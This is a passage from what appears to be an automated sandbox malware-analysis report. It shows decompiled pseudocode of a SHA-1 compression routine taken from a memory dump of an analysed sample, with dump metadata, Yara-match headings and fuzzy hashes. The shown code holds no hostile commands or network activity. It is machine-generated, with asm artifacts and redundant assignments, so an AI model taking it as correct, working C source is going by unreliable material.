                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				char _v304;
                                                                      				signed char* _t278;
                                                                      				signed int* _t279;
                                                                      				signed int _t280;
                                                                      				signed int _t286;
                                                                      				signed int _t289;
                                                                      				signed int _t293;
                                                                      				signed int _t296;
                                                                      				signed int _t300;
                                                                      				signed int _t304;
                                                                      				signed int _t306;
                                                                      				signed int _t312;
                                                                      				signed int _t320;
                                                                      				signed int _t322;
                                                                      				signed int _t325;
                                                                      				signed int _t327;
                                                                      				signed int _t336;
                                                                      				signed int _t342;
                                                                      				signed int _t343;
                                                                      				signed int _t348;
                                                                      				signed int _t356;
                                                                      				signed int _t360;
                                                                      				signed int _t361;
                                                                      				signed int _t365;
                                                                      				signed int _t368;
                                                                      				signed int _t372;
                                                                      				signed int _t373;
                                                                      				signed int _t402;
                                                                      				signed int _t407;
                                                                      				signed int _t413;
                                                                      				signed int _t416;
                                                                      				signed int _t423;
                                                                      				signed int _t426;
                                                                      				signed int _t435;
                                                                      				signed int _t437;
                                                                      				signed int _t440;
                                                                      				signed int _t448;
                                                                      				signed int _t463;
                                                                      				signed int _t466;
                                                                      				signed int _t467;
                                                                      				signed int _t468;
                                                                      				signed int _t474;
                                                                      				signed int _t482;
                                                                      				signed int _t483;
                                                                      				signed int* _t484;
                                                                      				signed int* _t487;
                                                                      				signed int _t494;
                                                                      				signed int _t497;
                                                                      				signed int _t502;
                                                                      				signed int _t505;
                                                                      				signed int _t508;
                                                                      				signed int _t511;
                                                                      				signed int _t512;
                                                                      				signed int _t516;
                                                                      				signed int _t528;
                                                                      				signed int _t531;
                                                                      				signed int _t538;
                                                                      				void* _t544;
                                                                      				void* _t546;
                                                                      
                                                                      				asm("scasd");
                                                                      				_t544 = _t546;
                                                                      				_t487 = _a4;
                                                                      				_t356 = 0;
                                                                      				_t2 =  &(_t487[7]); // 0x1b
                                                                      				_t278 = _t2;
                                                                      				do {
                                                                      					 *(_t544 + _t356 * 4 - 0x14c) = ((( *(_t278 - 1) & 0x000000ff) << 0x00000008 |  *_t278 & 0x000000ff) << 0x00000008 | _t278[1] & 0x000000ff) << 0x00000008 | _t278[2] & 0x000000ff;
                                                                      					 *(_t544 + _t356 * 4 - 0x148) = (((_t278[3] & 0x000000ff) << 0x00000008 | _t278[4] & 0x000000ff) << 0x00000008 | _t278[5] & 0x000000ff) << 0x00000008 | _t278[6] & 0x000000ff;
                                                                      					 *(_t544 + _t356 * 4 - 0x144) = (((_t278[7] & 0x000000ff) << 0x00000008 | _t278[8] & 0x000000ff) << 0x00000008 | _t278[9] & 0x000000ff) << 0x00000008 | _t278[0xa] & 0x000000ff;
                                                                      					 *(_t544 + _t356 * 4 - 0x140) = (((_t278[0xb] & 0x000000ff) << 0x00000008 | _t278[0xc] & 0x000000ff) << 0x00000008 | _t278[0xd] & 0x000000ff) << 0x00000008 | _t278[0xe] & 0x000000ff;
                                                                      					_t356 = _t356 + 4;
                                                                      					_t278 =  &(_t278[0x10]);
                                                                      				} while (_t356 < 0x10);
                                                                      				_t279 =  &_v304;
                                                                      				_v8 = 0x10;
                                                                      				do {
                                                                      					_t402 =  *(_t279 - 0x18);
                                                                      					_t463 =  *(_t279 - 0x14);
                                                                      					_t360 =  *(_t279 - 0x20) ^ _t279[5] ^  *_t279 ^ _t402;
                                                                      					asm("rol ecx, 1");
                                                                      					asm("rol ebx, 1");
                                                                      					_t279[9] =  *(_t279 - 0x1c) ^ _t279[6] ^ _t279[1] ^ _t463;
                                                                      					_t279[8] = _t360;
                                                                      					_t320 = _t279[7] ^  *(_t279 - 0x10) ^ _t279[2];
                                                                      					_t279 =  &(_t279[4]);
                                                                      					asm("rol ebx, 1");
                                                                      					asm("rol edx, 1");
                                                                      					_t46 =  &_v8;
                                                                      					 *_t46 = _v8 - 1;
                                                                      					_t279[6] = _t320 ^ _t402;
                                                                      					_t279[7] =  *(_t279 - 0x1c) ^  *(_t279 - 4) ^ _t360 ^ _t463;
                                                                      				} while ( *_t46 != 0);
                                                                      				_t322 =  *_t487;
                                                                      				_t280 = _t487[1];
                                                                      				_t361 = _t487[2];
                                                                      				_t407 = _t487[3];
                                                                      				_v12 = _t322;
                                                                      				_v16 = _t487[4];
                                                                      				_v8 = 0;
                                                                      				do {
                                                                      					asm("rol ebx, 0x5");
                                                                      					_t466 = _v8;
                                                                      					_t494 = _t322 + ( !_t280 & _t407 | _t361 & _t280) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x14c)) + _v16 + 0x5a827999;
                                                                      					_t325 = _v12;
                                                                      					asm("ror eax, 0x2");
                                                                      					_v16 = _t407;
                                                                      					_v12 = _t494;
                                                                      					asm("rol esi, 0x5");
                                                                      					_v8 = _t361;
                                                                      					_t413 = _t494 + ( !_t325 & _t361 | _t280 & _t325) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x148)) + _v16 + 0x5a827999;
                                                                      					_t497 = _t280;
                                                                      					asm("ror ebx, 0x2");
                                                                      					_v16 = _v8;
                                                                      					_t365 = _v12;
                                                                      					_v8 = _t325;
                                                                      					_t327 = _v8;
                                                                      					_v12 = _t413;
                                                                      					asm("rol edx, 0x5");
                                                                      					_t286 = _t413 + ( !_t365 & _t497 | _t325 & _t365) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x144)) + _v16 + 0x5a827999;
                                                                      					_t416 = _v12;
                                                                      					_v16 = _t497;
                                                                      					asm("ror ecx, 0x2");
                                                                      					_v8 = _t365;
                                                                      					_v12 = _t286;
                                                                      					asm("rol eax, 0x5");
                                                                      					_v16 = _t327;
                                                                      					_t502 = _t286 + ( !_t416 & _t327 | _t365 & _t416) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x140)) + _v16 + 0x5a827999;
                                                                      					_t361 = _v12;
                                                                      					_t289 = _v8;
                                                                      					asm("ror edx, 0x2");
                                                                      					_v8 = _t416;
                                                                      					_v12 = _t502;
                                                                      					asm("rol esi, 0x5");
                                                                      					_v16 = _t289;
                                                                      					_t280 = _v12;
                                                                      					_t505 = _t502 + ( !_t361 & _t289 | _t416 & _t361) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x13c)) + _v16 + 0x5a827999;
                                                                      					_t407 = _v8;
                                                                      					asm("ror ecx, 0x2");
                                                                      					_t467 = _t466 + 5;
                                                                      					_t322 = _t505;
                                                                      					_v12 = _t322;
                                                                      					_v8 = _t467;
                                                                      				} while (_t467 < 0x14);
                                                                      				_t468 = 0x14;
                                                                      				do {
                                                                      					asm("rol esi, 0x5");
                                                                      					asm("ror eax, 0x2");
                                                                      					_v16 = _t407;
                                                                      					_t508 = _t505 + (_t407 ^ _t361 ^ _t280) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
                                                                      					_t336 = _v12;
                                                                      					_v12 = _t508;
                                                                      					asm("rol esi, 0x5");
                                                                      					_t423 = _t508 + (_t361 ^ _t280 ^ _t336) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
                                                                      					asm("ror ebx, 0x2");
                                                                      					_t511 = _t280;
                                                                      					_v16 = _t361;
                                                                      					_t368 = _v12;
                                                                      					_v12 = _t423;
                                                                      					asm("rol edx, 0x5");
                                                                      					asm("ror ecx, 0x2");
                                                                      					_t293 = _t423 + (_t280 ^ _t336 ^ _t368) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
                                                                      					_t426 = _v12;
                                                                      					_v8 = _t336;
                                                                      					_v8 = _t368;
                                                                      					_v12 = _t293;
                                                                      					asm("rol eax, 0x5");
                                                                      					_t468 = _t468 + 5;
                                                                      					_t361 = _v12;
                                                                      					asm("ror edx, 0x2");
                                                                      					_t146 = _t511 + 0x6ed9eba1; // 0x6ed9eb9f
                                                                      					_t512 = _t293 + (_t336 ^ _v8 ^ _t426) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x154)) + _t146;
                                                                      					_t296 = _v8;
                                                                      					_v8 = _t426;
                                                                      					_v12 = _t512;
                                                                      					asm("rol esi, 0x5");
                                                                      					_t407 = _v8;
                                                                      					_t505 = _t512 + (_t296 ^ _v8 ^ _t361) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x150)) + _t336 + 0x6ed9eba1;
                                                                      					_v16 = _t296;
                                                                      					_t280 = _v12;
                                                                      					asm("ror ecx, 0x2");
                                                                      					_v12 = _t505;
                                                                      				} while (_t468 < 0x28);
                                                                      				_v8 = 0x28;
                                                                      				do {
                                                                      					asm("rol esi, 0x5");
                                                                      					_v16 = _t407;
                                                                      					asm("ror eax, 0x2");
                                                                      					_t516 = ((_t361 | _t280) & _t407 | _t361 & _t280) +  *((intOrPtr*)(_t544 + _v8 * 4 - 0x14c)) + _t505 + _v16 - 0x70e44324;
                                                                      					_t474 = _v12;
                                                                      					_v12 = _t516;
                                                                      					asm("rol esi, 0x5");
                                                                      					_t342 = _v8;
                                                                      					asm("ror edi, 0x2");
                                                                      					_t435 = ((_t280 | _t474) & _t361 | _t280 & _t474) +  *((intOrPtr*)(_t544 + _t342 * 4 - 0x148)) + _t516 + _v16 - 0x70e44324;
                                                                      					_v16 = _t361;
                                                                      					_t372 = _v12;
                                                                      					_v12 = _t435;
                                                                      					asm("rol edx, 0x5");
                                                                      					_v8 = _t280;
                                                                      					_t437 = ((_t474 | _t372) & _t280 | _t474 & _t372) +  *((intOrPtr*)(_t544 + _t342 * 4 - 0x144)) + _t435 + _v16 - 0x70e44324;
                                                                      					asm("ror ecx, 0x2");
                                                                      					_v16 = _v8;
                                                                      					_t300 = _v12;
                                                                      					_v8 = _t474;
                                                                      					_v12 = _t437;
                                                                      					asm("rol edx, 0x5");
                                                                      					asm("ror eax, 0x2");
                                                                      					_t528 = ((_t372 | _t300) & _t474 | _t372 & _t300) +  *((intOrPtr*)(_t544 + _t342 * 4 - 0x140)) + _t437 + _v16 - 0x70e44324;
                                                                      					_v16 = _v8;
                                                                      					_t440 = _t372;
                                                                      					_t361 = _v12;
                                                                      					_v8 = _t440;
                                                                      					_v12 = _t528;
                                                                      					asm("rol esi, 0x5");
                                                                      					_v16 = _v8;
                                                                      					_t505 = ((_t300 | _t361) & _t440 | _t300 & _t361) +  *((intOrPtr*)(_t544 + _t342 * 4 - 0x13c)) + _t528 + _v16 - 0x70e44324;
                                                                      					_t407 = _t300;
                                                                      					_t280 = _v12;
                                                                      					asm("ror ecx, 0x2");
                                                                      					_v12 = _t505;
                                                                      					_t343 = _t342 + 5;
                                                                      					_v8 = _t343;
                                                                      				} while (_t343 < 0x3c);
                                                                      				_t482 = 0x3c;
                                                                      				_v8 = 0x3c;
                                                                      				do {
                                                                      					asm("rol esi, 0x5");
                                                                      					_t483 = _v8;
                                                                      					asm("ror eax, 0x2");
                                                                      					_t531 = (_t407 ^ _t361 ^ _t280) +  *((intOrPtr*)(_t544 + _t482 * 4 - 0x14c)) + _t505 + _v16 - 0x359d3e2a;
                                                                      					_t348 = _v12;
                                                                      					_v16 = _t407;
                                                                      					_v12 = _t531;
                                                                      					asm("rol esi, 0x5");
                                                                      					asm("ror ebx, 0x2");
                                                                      					_t448 = (_t361 ^ _t280 ^ _t348) +  *((intOrPtr*)(_t544 + _t483 * 4 - 0x148)) + _t531 + _v16 - 0x359d3e2a;
                                                                      					_v16 = _t361;
                                                                      					_t373 = _v12;
                                                                      					_v12 = _t448;
                                                                      					asm("rol edx, 0x5");
                                                                      					_v16 = _t280;
                                                                      					asm("ror ecx, 0x2");
                                                                      					_t304 = (_t280 ^ _t348 ^ _t373) +  *((intOrPtr*)(_t544 + _t483 * 4 - 0x144)) + _t448 + _v16 - 0x359d3e2a;
                                                                      					_t407 = _v12;
                                                                      					_v12 = _t304;
                                                                      					asm("rol eax, 0x5");
                                                                      					_v16 = _t348;
                                                                      					_t538 = (_t348 ^ _t373 ^ _t407) +  *((intOrPtr*)(_t544 + _t483 * 4 - 0x140)) + _t304 + _v16 - 0x359d3e2a;
                                                                      					_t306 = _t373;
                                                                      					_v8 = _t348;
                                                                      					asm("ror edx, 0x2");
                                                                      					_v8 = _t373;
                                                                      					_t361 = _v12;
                                                                      					_v12 = _t538;
                                                                      					asm("rol esi, 0x5");
                                                                      					_t482 = _t483 + 5;
                                                                      					_t505 = (_t306 ^ _t407 ^ _t361) +  *((intOrPtr*)(_t544 + _t483 * 4 - 0x13c)) + _t538 + _v16 - 0x359d3e2a;
                                                                      					_v16 = _t306;
                                                                      					_t280 = _v12;
                                                                      					asm("ror ecx, 0x2");
                                                                      					_v8 = _t407;
                                                                      					_v12 = _t505;
                                                                      					_v8 = _t482;
                                                                      				} while (_t482 < 0x50);
                                                                      				_t484 = _a4;
                                                                      				_t484[2] = _t484[2] + _t361;
                                                                      				_t484[3] = _t484[3] + _t407;
                                                                      				_t312 = _t484[4] + _v16;
                                                                      				 *_t484 =  *_t484 + _t505;
                                                                      				_t484[1] = _t484[1] + _t280;
                                                                      				_t484[4] = _t312;
                                                                      				_t484[0x17] = 0;
                                                                      				return _t312;
                                                                      			}

































































                                                                      0x00408c5b
                                                                      0x00408c61
                                                                      0x00408c6b
                                                                      0x00408c6f
                                                                      0x00408c71
                                                                      0x00408c71
                                                                      0x00408c74
                                                                      0x00408c96
                                                                      0x00408cbc
                                                                      0x00408ce2
                                                                      0x00408d04
                                                                      0x00408d0b
                                                                      0x00408d0e
                                                                      0x00408d11
                                                                      0x00408d1a
                                                                      0x00408d20
                                                                      0x00408d27
                                                                      0x00408d38
                                                                      0x00408d3b
                                                                      0x00408d3e
                                                                      0x00408d42
                                                                      0x00408d44
                                                                      0x00408d46
                                                                      0x00408d4f
                                                                      0x00408d52
                                                                      0x00408d55
                                                                      0x00408d60
                                                                      0x00408d66
                                                                      0x00408d68
                                                                      0x00408d68
                                                                      0x00408d6b
                                                                      0x00408d6e
                                                                      0x00408d6e
                                                                      0x00408d73
                                                                      0x00408d75
                                                                      0x00408d78
                                                                      0x00408d7b
                                                                      0x00408d81
                                                                      0x00408d84
                                                                      0x00408d87
                                                                      0x00408d90
                                                                      0x00408d96
                                                                      0x00408d9f
                                                                      0x00408dae
                                                                      0x00408db5
                                                                      0x00408db8
                                                                      0x00408dbb
                                                                      0x00408dc4
                                                                      0x00408dc7
                                                                      0x00408dca
                                                                      0x00408de2
                                                                      0x00408de9
                                                                      0x00408deb
                                                                      0x00408dee
                                                                      0x00408df1
                                                                      0x00408dfa
                                                                      0x00408e01
                                                                      0x00408e04
                                                                      0x00408e07
                                                                      0x00408e16
                                                                      0x00408e1d
                                                                      0x00408e20
                                                                      0x00408e23
                                                                      0x00408e2c
                                                                      0x00408e36
                                                                      0x00408e39
                                                                      0x00408e45
                                                                      0x00408e48
                                                                      0x00408e4f
                                                                      0x00408e52
                                                                      0x00408e55
                                                                      0x00408e5a
                                                                      0x00408e5d
                                                                      0x00408e66
                                                                      0x00408e77
                                                                      0x00408e7a
                                                                      0x00408e7d
                                                                      0x00408e84
                                                                      0x00408e87
                                                                      0x00408e8a
                                                                      0x00408e8d
                                                                      0x00408e8f
                                                                      0x00408e92
                                                                      0x00408e95
                                                                      0x00408e9e
                                                                      0x00408ea3
                                                                      0x00408ea3
                                                                      0x00408eb8
                                                                      0x00408ebb
                                                                      0x00408ebe
                                                                      0x00408ec5
                                                                      0x00408ec8
                                                                      0x00408ecb
                                                                      0x00408ee0
                                                                      0x00408ee7
                                                                      0x00408eea
                                                                      0x00408eee
                                                                      0x00408ef1
                                                                      0x00408ef6
                                                                      0x00408ef9
                                                                      0x00408f08
                                                                      0x00408f0b
                                                                      0x00408f12
                                                                      0x00408f15
                                                                      0x00408f18
                                                                      0x00408f1b
                                                                      0x00408f1e
                                                                      0x00408f26
                                                                      0x00408f34
                                                                      0x00408f37
                                                                      0x00408f3a
                                                                      0x00408f3a
                                                                      0x00408f41
                                                                      0x00408f44
                                                                      0x00408f47
                                                                      0x00408f4f
                                                                      0x00408f5d
                                                                      0x00408f60
                                                                      0x00408f67
                                                                      0x00408f6a
                                                                      0x00408f6d
                                                                      0x00408f70
                                                                      0x00408f73
                                                                      0x00408f7c
                                                                      0x00408f83
                                                                      0x00408f83
                                                                      0x00408f89
                                                                      0x00408fa2
                                                                      0x00408fa5
                                                                      0x00408fac
                                                                      0x00408faf
                                                                      0x00408fb2
                                                                      0x00408fc4
                                                                      0x00408fce
                                                                      0x00408fd1
                                                                      0x00408fda
                                                                      0x00408fdd
                                                                      0x00408fe4
                                                                      0x00408fe7
                                                                      0x00408fed
                                                                      0x00409000
                                                                      0x00409007
                                                                      0x0040900a
                                                                      0x0040900d
                                                                      0x00409010
                                                                      0x00409019
                                                                      0x0040901c
                                                                      0x0040902f
                                                                      0x00409032
                                                                      0x0040903c
                                                                      0x0040903f
                                                                      0x00409041
                                                                      0x0040904a
                                                                      0x0040904d
                                                                      0x00409060
                                                                      0x00409066
                                                                      0x00409069
                                                                      0x00409070
                                                                      0x00409072
                                                                      0x00409075
                                                                      0x00409078
                                                                      0x0040907b
                                                                      0x0040907e
                                                                      0x00409081
                                                                      0x0040908a
                                                                      0x0040908f
                                                                      0x00409092
                                                                      0x00409092
                                                                      0x004090a5
                                                                      0x004090a8
                                                                      0x004090ab
                                                                      0x004090b2
                                                                      0x004090b5
                                                                      0x004090b8
                                                                      0x004090bb
                                                                      0x004090ce
                                                                      0x004090d1
                                                                      0x004090dc
                                                                      0x004090df
                                                                      0x004090eb
                                                                      0x004090ee
                                                                      0x004090f4
                                                                      0x004090f7
                                                                      0x004090fa
                                                                      0x00409101
                                                                      0x00409111
                                                                      0x00409114
                                                                      0x0040911a
                                                                      0x0040911d
                                                                      0x00409124
                                                                      0x00409126
                                                                      0x00409129
                                                                      0x0040912c
                                                                      0x0040912f
                                                                      0x00409132
                                                                      0x00409139
                                                                      0x00409148
                                                                      0x0040914b
                                                                      0x00409152
                                                                      0x00409155
                                                                      0x00409158
                                                                      0x0040915b
                                                                      0x0040915e
                                                                      0x00409161
                                                                      0x00409164
                                                                      0x0040916d
                                                                      0x0040917e
                                                                      0x00409186
                                                                      0x0040918c
                                                                      0x0040918f
                                                                      0x00409191
                                                                      0x00409194
                                                                      0x00409197
                                                                      0x004091a4

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (
                                                                      • API String ID: 0-3887548279
                                                                      • Opcode ID: 9a16899f6d4f2b3c0a8a619eb872227bae52f09b6b7aba11155acd4c728968c4
                                                                      • Instruction ID: c6bd933662e194c17fd244281a6b6f2211331088f5ec86a73b3659ffbecce607
                                                                      • Opcode Fuzzy Hash: 9a16899f6d4f2b3c0a8a619eb872227bae52f09b6b7aba11155acd4c728968c4
                                                                      • Instruction Fuzzy Hash: DF021CB6E006189FDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7355D6746A418F80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 73%
                                                                      			E00408C60(signed int* _a4) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				char _v304;
                                                                      				signed char* _t277;
                                                                      				signed int* _t278;
                                                                      				signed int _t279;
                                                                      				signed int _t285;
                                                                      				signed int _t288;
                                                                      				signed int _t292;
                                                                      				signed int _t295;
                                                                      				signed int _t299;
                                                                      				signed int _t303;
                                                                      				signed int _t305;
                                                                      				signed int _t311;
                                                                      				signed int _t318;
                                                                      				signed int _t320;
                                                                      				signed int _t323;
                                                                      				signed int _t325;
                                                                      				signed int _t334;
                                                                      				signed int _t340;
                                                                      				signed int _t341;
                                                                      				signed int _t346;
                                                                      				signed int _t353;
                                                                      				signed int _t357;
                                                                      				signed int _t358;
                                                                      				signed int _t362;
                                                                      				signed int _t365;
                                                                      				signed int _t369;
                                                                      				signed int _t370;
                                                                      				signed int _t399;
                                                                      				signed int _t404;
                                                                      				signed int _t410;
                                                                      				signed int _t413;
                                                                      				signed int _t420;
                                                                      				signed int _t423;
                                                                      				signed int _t432;
                                                                      				signed int _t434;
                                                                      				signed int _t437;
                                                                      				signed int _t445;
                                                                      				signed int _t459;
                                                                      				signed int _t462;
                                                                      				signed int _t463;
                                                                      				signed int _t464;
                                                                      				signed int _t470;
                                                                      				signed int _t478;
                                                                      				signed int _t479;
                                                                      				signed int* _t480;
                                                                      				signed int* _t481;
                                                                      				signed int _t488;
                                                                      				signed int _t491;
                                                                      				signed int _t496;
                                                                      				signed int _t499;
                                                                      				signed int _t502;
                                                                      				signed int _t505;
                                                                      				signed int _t506;
                                                                      				signed int _t510;
                                                                      				signed int _t522;
                                                                      				signed int _t525;
                                                                      				signed int _t532;
                                                                      				void* _t536;
                                                                      
                                                                      				_t481 = _a4;
                                                                      				_t353 = 0;
                                                                      				_t2 =  &(_t481[7]); // 0x1b
                                                                      				_t277 = _t2;
                                                                      				do {
                                                                      					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
                                                                      					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
                                                                      					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
                                                                      					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
                                                                      					_t353 = _t353 + 4;
                                                                      					_t277 =  &(_t277[0x10]);
                                                                      				} while (_t353 < 0x10);
                                                                      				_t278 =  &_v304;
                                                                      				_v8 = 0x10;
                                                                      				do {
                                                                      					_t399 =  *(_t278 - 0x18);
                                                                      					_t459 =  *(_t278 - 0x14);
                                                                      					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
                                                                      					asm("rol ecx, 1");
                                                                      					asm("rol ebx, 1");
                                                                      					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
                                                                      					_t278[8] = _t357;
                                                                      					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
                                                                      					_t278 =  &(_t278[4]);
                                                                      					asm("rol ebx, 1");
                                                                      					asm("rol edx, 1");
                                                                      					_t46 =  &_v8;
                                                                      					 *_t46 = _v8 - 1;
                                                                      					_t278[6] = _t318 ^ _t399;
                                                                      					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
                                                                      				} while ( *_t46 != 0);
                                                                      				_t320 =  *_t481;
                                                                      				_t279 = _t481[1];
                                                                      				_t358 = _t481[2];
                                                                      				_t404 = _t481[3];
                                                                      				_v12 = _t320;
                                                                      				_v16 = _t481[4];
                                                                      				_v8 = 0;
                                                                      				do {
                                                                      					asm("rol ebx, 0x5");
                                                                      					_t462 = _v8;
                                                                      					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
                                                                      					_t323 = _v12;
                                                                      					asm("ror eax, 0x2");
                                                                      					_v16 = _t404;
                                                                      					_v12 = _t488;
                                                                      					asm("rol esi, 0x5");
                                                                      					_v8 = _t358;
                                                                      					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
                                                                      					_t491 = _t279;
                                                                      					asm("ror ebx, 0x2");
                                                                      					_v16 = _v8;
                                                                      					_t362 = _v12;
                                                                      					_v8 = _t323;
                                                                      					_t325 = _v8;
                                                                      					_v12 = _t410;
                                                                      					asm("rol edx, 0x5");
                                                                      					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
                                                                      					_t413 = _v12;
                                                                      					_v16 = _t491;
                                                                      					asm("ror ecx, 0x2");
                                                                      					_v8 = _t362;
                                                                      					_v12 = _t285;
                                                                      					asm("rol eax, 0x5");
                                                                      					_v16 = _t325;
                                                                      					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
                                                                      					_t358 = _v12;
                                                                      					_t288 = _v8;
                                                                      					asm("ror edx, 0x2");
                                                                      					_v8 = _t413;
                                                                      					_v12 = _t496;
                                                                      					asm("rol esi, 0x5");
                                                                      					_v16 = _t288;
                                                                      					_t279 = _v12;
                                                                      					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
                                                                      					_t404 = _v8;
                                                                      					asm("ror ecx, 0x2");
                                                                      					_t463 = _t462 + 5;
                                                                      					_t320 = _t499;
                                                                      					_v12 = _t320;
                                                                      					_v8 = _t463;
                                                                      				} while (_t463 < 0x14);
                                                                      				_t464 = 0x14;
                                                                      				do {
                                                                      					asm("rol esi, 0x5");
                                                                      					asm("ror eax, 0x2");
                                                                      					_v16 = _t404;
                                                                      					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
                                                                      					_t334 = _v12;
                                                                      					_v12 = _t502;
                                                                      					asm("rol esi, 0x5");
                                                                      					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
                                                                      					asm("ror ebx, 0x2");
                                                                      					_t505 = _t279;
                                                                      					_v16 = _t358;
                                                                      					_t365 = _v12;
                                                                      					_v12 = _t420;
                                                                      					asm("rol edx, 0x5");
                                                                      					asm("ror ecx, 0x2");
                                                                      					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
                                                                      					_t423 = _v12;
                                                                      					_v8 = _t334;
                                                                      					_v8 = _t365;
                                                                      					_v12 = _t292;
                                                                      					asm("rol eax, 0x5");
                                                                      					_t464 = _t464 + 5;
                                                                      					_t358 = _v12;
                                                                      					asm("ror edx, 0x2");
                                                                      					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9eb9f
                                                                      					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
                                                                      					_t295 = _v8;
                                                                      					_v8 = _t423;
                                                                      					_v12 = _t506;
                                                                      					asm("rol esi, 0x5");
                                                                      					_t404 = _v8;
                                                                      					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
                                                                      					_v16 = _t295;
                                                                      					_t279 = _v12;
                                                                      					asm("ror ecx, 0x2");
                                                                      					_v12 = _t499;
                                                                      				} while (_t464 < 0x28);
                                                                      				_v8 = 0x28;
                                                                      				do {
                                                                      					asm("rol esi, 0x5");
                                                                      					_v16 = _t404;
                                                                      					asm("ror eax, 0x2");
                                                                      					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
                                                                      					_t470 = _v12;
                                                                      					_v12 = _t510;
                                                                      					asm("rol esi, 0x5");
                                                                      					_t340 = _v8;
                                                                      					asm("ror edi, 0x2");
                                                                      					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
                                                                      					_v16 = _t358;
                                                                      					_t369 = _v12;
                                                                      					_v12 = _t432;
                                                                      					asm("rol edx, 0x5");
                                                                      					_v8 = _t279;
                                                                      					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
                                                                      					asm("ror ecx, 0x2");
                                                                      					_v16 = _v8;
                                                                      					_t299 = _v12;
                                                                      					_v8 = _t470;
                                                                      					_v12 = _t434;
                                                                      					asm("rol edx, 0x5");
                                                                      					asm("ror eax, 0x2");
                                                                      					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
                                                                      					_v16 = _v8;
                                                                      					_t437 = _t369;
                                                                      					_t358 = _v12;
                                                                      					_v8 = _t437;
                                                                      					_v12 = _t522;
                                                                      					asm("rol esi, 0x5");
                                                                      					_v16 = _v8;
                                                                      					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
                                                                      					_t404 = _t299;
                                                                      					_t279 = _v12;
                                                                      					asm("ror ecx, 0x2");
                                                                      					_v12 = _t499;
                                                                      					_t341 = _t340 + 5;
                                                                      					_v8 = _t341;
                                                                      				} while (_t341 < 0x3c);
